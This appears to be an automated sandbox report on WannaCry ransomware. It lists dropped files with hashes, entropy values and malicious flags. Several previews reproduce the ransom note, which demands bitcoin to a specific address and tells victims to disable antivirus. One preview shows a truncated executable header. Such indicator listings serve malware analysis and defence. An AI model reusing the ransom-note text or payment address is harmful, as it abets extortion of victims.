                                                  SSDEEP:786432:XUwNr64ZDvuXoUsjr+/KVjFZRRad2pf7WPvZZXACM+n:XrF64ZKYUsjiSVBEd6WPRZXf
                                                  MD5:4F23366DB6A22471BC2BDD6C24F8BB32
                                                  SHA1:3257B71FA8397B88B03A87E302A6113890D921B4
                                                  SHA-256:6EC40BA3236F2818DBD3F3C78B6CCC42771D74B66C3298B9E4DC188EA4216E69
                                                  SHA-512:FDDC5ED80DE8179CCF739217ACCA0ED622CB10A41AD623B664D27237D6661D6B739A8EFB35FD84234ECEB50662E142D5652FB595C6321463F1DE240B5E828A9C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):196888
                                                  Entropy (8bit):7.999058078625466
                                                  Encrypted:true
                                                  SSDEEP:3072:8lonyAoZlEDo9CPza9ilo58KBJEQIV/kmvL5MLONe9AwiXOkKfxdKuk3K:8y/o7HAe9CoeKBJEzTvLOicPkKjKf6
                                                  MD5:E35D7BBC0D57DC7723FCE0335BECD046
                                                  SHA1:588C11939B85BC67FFF669F39FCC8F71DD718077
                                                  SHA-256:0A4DEB637FE12E8533A32CB425A0EB685E85CDB52A41F651F7BC26B2CB51BEF0
                                                  SHA-512:29079AE3DF4C9120B7C6912A868D6907CE51D1480ADD8B6A8CD1BCB11002685E4A3F7EC7A1F966B702F253788FC20C93256CF5D95E23EFD45FF8AE4B0F38AE94
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):904
                                                  Entropy (8bit):7.761847202238421
                                                  Encrypted:false
                                                  SSDEEP:24:bkY6RCOOwWWrSf2+ferKcet20oYxT0TIOmDbCBl:bkY6RXprW3J20oYxYTItel
                                                  MD5:0DF7A26D21F3697302A71F0CA458405A
                                                  SHA1:0EC783E9386759699867881119F11BF0C1BC395D
                                                  SHA-256:C758CD2347A5816E8A2030913B4D44B582B41A3CA4D71BEEC8BAF6E5F4E6AC00
                                                  SHA-512:29CAC2F3F9E99D91C9BA0DBC1CE09F9F20913E98A0FB13AD9D8AC2B16D176D26D122BCC09AC4474E082F1CC0F9977BC5D06E45C2245E02B4666E72C60EDCE809
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):602456
                                                  Entropy (8bit):7.999676947807036
                                                  Encrypted:true
                                                  SSDEEP:12288:DANNC3PG0r/8GT/mssi6rRaiy/0k2tHaUSgn/DRii/z4+9jUMvF:DANN4r/hTSiGRV5ptHPSQ/F5742UMvF
                                                  MD5:E457B2AD637896467E20E6E0945DBCE2
                                                  SHA1:4396593E84939AA3FA224F65FBDF69549B9A4C99
                                                  SHA-256:58C17538B6EFBCA5D6C8EA45A6805D87A20066C065A0EBB8AD7FC08B963AD024
                                                  SHA-512:9FD4B32A602F53E8E6E55FE36A087331EC0C0150B0403D1D648AEF6CF200AF645C4D7435330B7A56FF0DB931A6C2D7166FD81144413AC3B6F77DA5ADBCA521B5
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6344
                                                  Entropy (8bit):7.973953742796694
                                                  Encrypted:false
                                                  SSDEEP:96:oCxBP7n/eH3d3kiqDV9hbRh1lNMSg7VPruzZYzSskPbqTJMwB5zkIci0stwvjY:tx/edp8V9RplNMnPSzQSsS6MY5zkzH/k
                                                  MD5:631014F2F2901BE7A2AD2E4A1AEEA58B
                                                  SHA1:197AB0FE62A60BEAF3FC5FECB9BFA518CBF08A71
                                                  SHA-256:24F27A9B11B65F988385CFB2978F529441F0165E322C539E86449F0D2B7EE99D
                                                  SHA-512:28889176E0EF95CBA153FE2F269189B95E9B36284820F4D18BFEF6861C5850A1921A62FD4ED0133EE5769A646E4590EF0DA47FA228F02B02D46C1C6C17AF7A39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2680
                                                  Entropy (8bit):7.930426485585328
                                                  Encrypted:false
                                                  SSDEEP:48:bk4ygMI0GbiMsrR7YjL3T6t7CP19s5/TWsIJ57Rj7Thhkvq56Ze6jPQmljrYSRHR:o4yb5MQ0Lg7g6/lIJ/jfhmq56Ze6jPQE
                                                  MD5:D2FFCCCC804893D41DF8FFF1DC5BB10C
                                                  SHA1:8BD29CEC592BD8D1A8D546CFFC9EA83B696A74F5
                                                  SHA-256:05642E82CDD0B7BAFE9CB38FFB86F7FB3263FB47054A5F49A39565DAA2FE6455
                                                  SHA-512:641D5EFA271B8FBA3CC26127B06AE9B354BD79FC3EC817BAF7EA48D5EBC34FAEA173F0EA5928B3BF4BD459414A3F0F91EB8E0730DC76B79C4E0F82C5D15B183E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):728
                                                  Entropy (8bit):7.6740853261315936
                                                  Encrypted:false
                                                  SSDEEP:12:bkEc7V2xyGhodYxUfD1Fx3MTXMj7HC06OOW9/zf5tc4P3Ti2wX+xCQlGJqz0Y6:bkJoyWefhL3MDMjZaW9/zf5FBQi4qzu
                                                  MD5:4CD1AA8F0328D3902A55D44C3488B256
                                                  SHA1:DA6D1E484C57FF70FD96FFD091C454834099DD64
                                                  SHA-256:A42C462AD513938AAE9E0C6E8E7EFD54A9554B2A88D3075DF109116328494AA9
                                                  SHA-512:A6DAB99704A2ECB11E117F40D005F074022122A29BF979B735A3AA77C92355AA5AAD9367384489DFF91BA69015D35F6F8E6DB0B886B5A1EDD491299A7724443A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):808
                                                  Entropy (8bit):7.724961017358963
                                                  Encrypted:false
                                                  SSDEEP:24:bk9eZPo6UjkM0EleoI1V/V4RvjQsB1DglX9:bk9+thRoI1H4RlgN9
                                                  MD5:4622ADDE8F2867BFC9BA4084891D898A
                                                  SHA1:2C040542A299140255C6EECA51A36AA8EAE7AEB5
                                                  SHA-256:04035D41B1E582D461B408595BB562775F92406980F0836D3B5F89039241D8C8
                                                  SHA-512:6EECA597D4274EFBBA1063D33169D8D0F9507D5B00BFC7EC17BD55999CAC2E15DA1B9701CB74637778F98524C05B4B58AC7D5C45DDC86E6E1934909A9A490A65
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):904
                                                  Entropy (8bit):7.774816263615113
                                                  Encrypted:false
                                                  SSDEEP:24:bknze8MXnSjapvp5liTEnIEhu2kubvVz4jbXMPK3//oONED:bknz7KnSyiTAutube3MyXoeED
                                                  MD5:2B384C311597694DD9EAAC7D0ED64C66
                                                  SHA1:257DB3D6678857F3C4A144D8AF7541ABFECD5FD6
                                                  SHA-256:EAEC6F687FE4C3E7786B97A17B237BF0BFAB7EE69220CE7EB638501E33D9C361
                                                  SHA-512:64E36CED11FDB88356EE684F45F28BD352BEC2ACD0545126857CC8A0771883A8EADC48F7044E4D7AA552AF0D66150FA174A3B9851A987D11FA7CFFBBFBA0EF6C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):602456
                                                  Entropy (8bit):7.999716794662296
                                                  Encrypted:true
                                                  SSDEEP:12288:8KJ50EAA9WKmCLRI7ky2CKA6LW8EGkl9QomSI1VhHPN1d+BPz:Z0zKmCLPW1odhHPNA
                                                  MD5:D58E1A87274A7AB2168787154E1D5972
                                                  SHA1:1B9E274305787FA51031EEDCEDD4528C02B977E0
                                                  SHA-256:F4B19F40A8E16C9029DB1C7CEFDC2DEC68A0EDDC7FD6782915839113C7DC8DA8
                                                  SHA-512:814CE6554C9586EF80D1049BA3352065F788224161E8366948FB322E1A7A3BECC7CD9EE23DF15F49D776123A719B5CAEFC6D91E08B4FD6B408AADE69E1611647
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6344
                                                  Entropy (8bit):7.972882398881123
                                                  Encrypted:false
                                                  SSDEEP:96:o0FhqT97cd2iUwWJSV7R3YM2Wmh+IC2gMj7sY04MCjRQyGlv6Ni2XBvVx:1TdGwWJw9YhWvZ4sY04dljMAiKVx
                                                  MD5:3E4BCB3C5070AFCD95251DF476CC7945
                                                  SHA1:04226B583D2A138D9AA007BF51F4C7825E2F8364
                                                  SHA-256:01FE0E360E3F024A31D6EFB91208D088743DA441D8A6C64CD84B7A48FFB74129
                                                  SHA-512:9B7D9858A10D6281C32020EE822ED1B0825FF9136D21594D929107ABA2A5C3FBF23CB51C612B3582D068638BA299A5ED8C7821178484D5330EBFCC93D929DF63
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7000
                                                  Entropy (8bit):7.9749428884531035
                                                  Encrypted:false
                                                  SSDEEP:192:i4XL0DrCpeo5X7o3ACvi5T2VFL27jDuX4VakDEcYi5HdEil:nLcrFo4te5WgakA+tdL
                                                  MD5:D67377256B59EB0626833F7C24028696
                                                  SHA1:EB90AA6A2F7A0B5AA2FEEFAD93AA0C6ED8871D76
                                                  SHA-256:21CC8B780380BD9A08855182DC4BEE40FBE492669A8EB1737BCBBE33D45950D6
                                                  SHA-512:118A991464663E655094232DE025D2716B42FE42C15C1D05A1A9F1A9D5399B7569CBF8F67E7ED60371DE6783AEF0C427517BA4B99D75A382219BF4E593A2A0E6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7000
                                                  Entropy (8bit):7.974913211664829
                                                  Encrypted:false
                                                  SSDEEP:192:Em5wB/N0gHfSZi0kXCVviIHiNoWjpWbJnYY:xuKg/Sg0WCpTCaJnYY
                                                  MD5:809F1A2208D4617FE328F5EA8FFBD170
                                                  SHA1:D4A4C7580C857AA6AF4D6F938B98F601487329C6
                                                  SHA-256:230384FD2C517502716369F0AD2D6F9243F97F47221529DF16D7BE0F9D222D97
                                                  SHA-512:93A09572A5A78D9BF17A01A2B1B315DCD32F6FE64BDF46A979AE24AB9CB28078C402B89CF99778E0B60220A6AAE89173495D3C439E7045EF3FC25A8ABBE538D5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):917784
                                                  Entropy (8bit):7.999786599525017
                                                  Encrypted:true
                                                  SSDEEP:24576:Se3EOiQGzlr2I40E+V4n8RM3Y+SDZduyjB1zKDaA42v:zEOqRE44ntYrQYB1zr9m
                                                  MD5:D668708F1B2DB3A63B1A474479183B9B
                                                  SHA1:EA32B396A06ED0D285372EF52DC8BD05DF1AD9E4
                                                  SHA-256:10DDF8EE5E757ACF3A2D4A7848179AAA808ABF83A539BB63A8BB7EBDB9BEF91D
                                                  SHA-512:E0D062D4259BDB78A54BF1CEB7AC3CFD8E08F86AF3C0AC1F5E5921786196541BBD4627CADF1B49935629CF52D38945C82C56024907DAF07188BAA0975BB808B0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):89816
                                                  Entropy (8bit):7.99792862114747
                                                  Encrypted:true
                                                  SSDEEP:1536:D2nwlTItrIZF+b1wEq0/MUk/oWOeylbs477wrDLxLIXdGIaEZ:ww1KXtqaML69bsS7sxUXge
                                                  MD5:E8671AE2A7936B35DCFCA9EF944B03AC
                                                  SHA1:2647715F91BCAD7D8E6500F4BFF07EE949C6C096
                                                  SHA-256:74B6028441DCA20B12ED6F757F3371E084A7F0D18E79B5E3756D39D62C633CDA
                                                  SHA-512:4122A45791BB92A928FEB65ECB475FDDCA77066A0F6068D273DBBAAD7AA946158D1FF103841C9365F40C10FB6E4D3A5EEB9A4C7055C2F87CE0D1AD5B4C06346A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):516712
                                                  Entropy (8bit):7.9995955877153
                                                  Encrypted:true
                                                  SSDEEP:12288:WaXWduW49+v/Ek35WN33bc7uFCt3o5KF8BkRC2q70Yl1wntD:WJdP40zQN3w7u+3o548kRrdnB
                                                  MD5:839F0C5A094933ABF99406F7D518C732
                                                  SHA1:452A72A8C2CBD433ECC6E7389ECC8386A7CC95DE
                                                  SHA-256:42B8EA4FAE72B802277437FE8979FAE7737D3724CA1EA3450FA43AA133CB7461
                                                  SHA-512:116118455646D84579498D54D5A9E1F4480BA61E51B05AD14F485EE0E928E0ADFEA2A52F465E26FCB47B7AA7C0EF885E90EF728C615478B99B041774B0F80203
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.986883871069837
                                                  Encrypted:false
                                                  SSDEEP:384:mQ/XC18aH687FhH8rHDKTKkdzJV5OLCcuSWz3fLULR:m0A8fg0DgpJV5OLCvnUt
                                                  MD5:7471FDE09A4BAB127F608A5298C84825
                                                  SHA1:03C6EBBC6DEA879F2DE39E730AF9C910B09A2B55
                                                  SHA-256:7B8004E550D07730E08D3F7DA1B8CF8EC6D5FF0F73C6E9644B206876F3161D2D
                                                  SHA-512:EB4865BA6B1B7E2C2C3E61F1B1830039E826BD474C1961462630D04D905AD820DC7718F241E5BA21DAAFFCAF54F6083BC5EB13E362EB15FEE0A3001039ED8D38
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296168
                                                  Entropy (8bit):7.999470417377871
                                                  Encrypted:true
                                                  SSDEEP:6144:DkeHYtO4SYWuLDKQX9sueZYfbD4Mka1kK7:tHYE4FPXmYz1ka7
                                                  MD5:88C4E88E1535BAB936AEAF4B22BA7FCB
                                                  SHA1:A1ACEB310B94027662D2640FC6AE3B0D56B27BD3
                                                  SHA-256:99EB622C462E3C79FAC389E3E1246726B3E1BA2EFB33EAA4932B87B6BAE00EC4
                                                  SHA-512:17F70FE204C9EA6F245B18CB276E364F9640F4633199B17E4EAFE905F5FB086A65A3B3B7F99962BE7DFF04EEE60E5975D6313E5039C12EB9A9E4B9284B61E0FB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296392
                                                  Entropy (8bit):7.999442249256408
                                                  Encrypted:true
                                                  SSDEEP:6144:sh66JcR6DZAxvxB3dCJ2vtwwYDVAIJ55xENNpIFmrLI9vfrdkQV:s4R6ESZAsaIFnZf5kA
                                                  MD5:439901958027F98661C574C0BDC1DE07
                                                  SHA1:FED1BA87122D683B437414EFFF8E3E570ECD3D30
                                                  SHA-256:10ECE5BC030AADE921A1841CD8E52FD3491519E4E6BDD3612F566D62711ED4DE
                                                  SHA-512:CCF3593B36E869AFDB7109342B6D6394BAE495D979A399BC32AB7E755A6F24B3E517CD0FF71356D4138CF0DEE814E888BF0878BFAECC4B308CB31264CD3CFA99
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1528
                                                  Entropy (8bit):7.875693784149082
                                                  Encrypted:false
                                                  SSDEEP:24:bkOHxhsglhh8Y5W3j5AW0JsF26D04erFk0i2doCcnnA95s8YcV31QgT5a+sTMDqu:bk2xNklj5AW0J626D0H1XdoCYnAPs8x9
                                                  MD5:489B29A22AEFF46AF94C10AAE1A35958
                                                  SHA1:53ADA06A7870C1B84BB993CCED092A364F4B811D
                                                  SHA-256:701263BDC4F927C1C84FC3B507DE5054D32D5ADA35D7E6DD24DD372148D1BD3C
                                                  SHA-512:05B4F69A9190F5C693FA4A6285C1887B625111597A5F9E2AFFFB79D53806CBB810A0D39BDC90E27E984E425C0F354E42880524BF66AC4E47951ECCC3D6F2AFFF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):638136
                                                  Entropy (8bit):7.999681012444283
                                                  Encrypted:true
                                                  SSDEEP:12288:wgjBsafi7RQ8hvjGCMasmdFjDZHwZdjYjTrt8QlR2WkUsSizpXA:DVf6pvTZseFjDGHjYnDKmsSiz5A
                                                  MD5:61161E2251555FB621FA63D54919C8B3
                                                  SHA1:8EB4DD68FD6A6D514573FFF3C57EF6FC879FEB91
                                                  SHA-256:C37E8C5A87208139F48F6923E8378AF728AD95578353C0FF7EAFD8AFC9C60149
                                                  SHA-512:9341B56E54FCFB674F36F8F8CB343145E90D7E4185387073214D08CBC64F6021B5CC1749C9EF03C181AB639EDD6F00808660FF5FEBAA225FB31E4A032BBAC707
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):84536
                                                  Entropy (8bit):7.997941526731215
                                                  Encrypted:true
                                                  SSDEEP:1536:1pdllMBcPWT9/S38i3ta5ozWpUn7JDlnfkaI6m6PRk1B+mlL3VuaNcYoHzKnb:1PoCPWT97kta5ozWOnlDlnb13QlcaToK
                                                  MD5:C10E921BC884342E3C79231210EA6057
                                                  SHA1:70EB3A3601B152949A8CBAB5F7E343844BFE233D
                                                  SHA-256:FF51F972B68746B5BBA2182C782F3AC13598BBCB1C6040A3A3561A03C8EC9233
                                                  SHA-512:A84AD9714B7C78E4844DBCCC8B76FE934549363E0BBBE4F11C65034699CD203CC10A93CB4A29F6FD8744633B751AB2553C5679E1015DD71297DD7E0839E29D33
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):289832
                                                  Entropy (8bit):7.999207360977147
                                                  Encrypted:true
                                                  SSDEEP:6144:I3WAfY3QMMEC0+XgG0TzHV0gIcDL0zJv+r7UR4X/3RAPF3lT:I3WiY3QM+S0Nkm9+r724pUP
                                                  MD5:30664C86053D088D46328DDB29193BB9
                                                  SHA1:D5B89957F5AE8D0174437D085DFAB84CFE452F7D
                                                  SHA-256:DA1B0BE7034CAE13D4DAE0C1AA8C784A7B6C2846512822594657C45ADF53F132
                                                  SHA-512:BC8B80021E671A5541D90EEA0A4F71F088EBFAA80BD232E799D7F07F4D1777F7AF00B067AC0B5AA8972AC059B522F5F76EFBF2EFBBBB40B4165005804E8669D6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4872
                                                  Entropy (8bit):7.9597375337008645
                                                  Encrypted:false
                                                  SSDEEP:96:oIkwYA3k86nffc6adFrTxZHZ5txaQU1hLACkLCjG6iFELuZHdOt:kAU7nf06aBo1pABGjjl6Z9Ot
                                                  MD5:E75335AC5D37B79FFF35A4709B0C31F9
                                                  SHA1:743891ED50B75A48A34C495E03F4095BC274B1FA
                                                  SHA-256:F35013D8346EF5FE92AD5297B735EBBDCD410FE03904C4107E710742D0C43F72
                                                  SHA-512:F397E3924D7C49D9321DD1ED33BD76315E5603F52EBC7AA4AED46B8382971E3A403734A39BA87395ED7CDFBBCCA04A98FB38DAF1385E9F7AFF92314C31819DE8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
